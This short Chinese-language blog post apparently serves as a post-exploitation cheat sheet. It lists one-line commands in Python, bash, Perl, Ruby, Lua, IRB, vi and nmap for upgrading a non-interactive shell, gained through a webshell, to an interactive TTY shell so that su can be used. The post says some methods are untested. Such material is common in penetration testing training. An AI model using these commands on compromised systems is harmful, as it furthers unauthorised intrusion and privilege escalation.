通常在webshell中反弹一个shell到主机或VPS中,产生的shell并不是tty(交互式)shell 此时我们无法通过输入su命令来切换用户,故有此文
Python
python -c 'import pty; pty.spawn("/bin/sh")'下面的方式未验证成功,Python中没有echo,如果去掉echo保存到py文件中可以成功
echo os.system('/bin/bash')
Bash
/bin/sh -iPerl
直接执行
perl -e 'exec "/bin/sh";'perl脚本执行
exec"/bin/sh";Ruby
exec "/bin/sh"Lua
os.execute('/bin/sh')From within IRB
exec "/bin/sh"From within vi
:!bash另一种vi下的方式没有验证
:set shell=/bin/bash:shell
From within nmap
!sh欢迎在下方评论交流。